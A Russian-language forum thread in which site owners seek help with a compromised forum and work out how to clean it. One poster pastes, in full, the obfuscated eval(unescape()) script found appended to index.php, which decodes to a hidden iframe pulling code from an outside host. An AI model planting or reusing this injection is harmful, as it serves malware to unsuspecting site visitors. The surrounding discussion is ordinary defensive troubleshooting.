Как убить Трояна?

[Rayden]

и мой SAV молчит

[Петрович]

А мой НОД молчит. Вирусные базы - сегодняшние...

Базы от 29.09. Сегодня не ругнулся, промолчал.

[vintnenarkoman]

выручайте плз. У знакомых на форуме вирус есть, avast! на него ругается и дальше не пускает, сейчас решил проверить свой форум заразил или нет и понять не могу заразил или нет, avast! не ругается, форум работает нормально вроде, но вот в index.php в конце нашел такую штуку -

Код: Выделить всё

<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74
%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75
%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72
%61%6d%65%20%6e%61%6d%65%3d%30%30%36%20%73%72%63
%3d%5c%27%68%74%74%70%3a%2f%2f%77%69%6e%68%65%78
%2e%6f%72%67%2f%74%64%73%2f%69%6e%2e%63%67%69%3f
%33%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d
%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%34%33
%34%34%30%29%2b%27%32%39%34%32%31%5c%27%20%77%69
%64%74%68%3d%33%32%36%20%68%65%69%67%68%74%3d%34
%34%30%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c
%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72
%61%6d%65%3e%27%29")); </script>

вот типерь голову ломаю вирус али нет подскажите пожалуйста, мне уже сейчас начинать боятся или попозже? навсякий случай вот ссылка на форум - http://censored.formulao2.ru/forum/index.php

Alek$: вставил переносы строк в коде, чтобы страница не разъезжалась. А то неэстетично как-то

[Alek$]

Вирус.

[Браток]

Вчера такой же вирус(как выше в цитате) заразил, при этом форум упал. Нод32 молчит в тряпочку.
Но заражение произошло с другого компа, вообще без антивируса комп второй был. И кому интересно для того что бы заразиться достаточно иметь сессию на компе к форуму с админскими правами, т.к по заверению владельца этого компа, в менеджере пароля не было, т.к он был не задолго до этого перестановлен и не использовался ещё.

[vintnenarkoman]

сейчас упал и форум и сайт... что делать незнаю=((( алярм!!!

Добавлено спустя 2 часа 47 минут 18 секунд:

как всё оживить???? если полностью скопировать папку с сайтом и форумом на комп и все файлы поправить а потом обратно на сервак залить сможет это помочь?

[crash]

смотря что вам поломали

[vintnenarkoman]

да еслиб я знал сейчас даже не представляю что делать=((( сейчас при входе на сайт пишет что виртуальный сервер отсутствует или не функционирует.... что делать и куда лезть вапще не представляю=((( может чтото надо сделать в myadmin-e? Друзья! если ктото с этим сталкивался, подскажите по шагам что и где делать

[Alek$]

vintnenarkoman
поинтересуйтесь у хостера, не отключал ли он ваш сайт.

если полностью скопировать папку с сайтом и форумом на комп и все файлы поправить а потом обратно на сервак залить

Скорее всего, поможет.

[vintnenarkoman]

спасибо, чистка апсолютно всех файлов index.php и index.html помогла. типерь html всегда будет выключен, эксплоита подкинули скорее всего именно так...

[PanAm]

Подскажите, а в PHP файлах, после закрывающего тега ?> сервер продолжает обработку скрипта?

[Alek$]

PanAm
если он после ?> найдет <?php или <?, то он проболжит обработку до следующего ?> и так далее. Все остальное он воспринимает как обычный html

[Forester4x4]

чейто не пойму я ....
послу удаления скрипта
по ссылке на форум - выдается чистая страница с кодом

Код: Выделить всё

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=windows-1251"></HEAD>
<BODY></BODY></HTML>


Добавлено спустя 47 минут 54 секунды:

[Alek$]

Значит, где-то еще зло сидит.
Сделайте, например контекстный поиск по файлам по слову HEAD и посмотрите, что найдется.

[Forester4x4]

Alek$
спасибо...
исправлено путем удаления вервой строки из /forum/templates/Charcoal2/admin/page_header.tpl